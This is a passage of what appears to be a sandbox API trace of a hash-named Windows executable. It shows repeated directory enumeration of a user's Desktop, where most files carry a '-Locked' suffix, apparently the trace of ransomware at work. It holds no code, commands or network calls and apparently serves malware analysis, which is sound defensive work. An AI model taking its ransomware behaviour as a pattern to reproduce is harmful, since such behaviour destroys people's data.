ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0299.406] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0299.406] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0299.406] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0299.406] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0299.406] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0299.407] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0299.407] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0299.407] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0299.407] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0299.407] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0299.408] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0299.408] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0299.408] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0299.408] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0299.408] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0299.409] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0299.409] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0299.409] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0299.409] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0299.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0299.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0299.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0299.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0299.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0299.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0299.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0299.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0299.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.411] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.412] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0299.412] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0299.412] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3291bb98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3291bb98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.412] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3291bb98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3291bb98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3277d421, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3277d421, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3277d421, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0299.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327897d6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327897d6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327897d6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0299.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0299.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327920f7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0299.414] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0299.414] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0299.414] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0299.414] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0299.415] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0299.415] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0299.415] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0299.416] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0299.416] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0299.416] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, 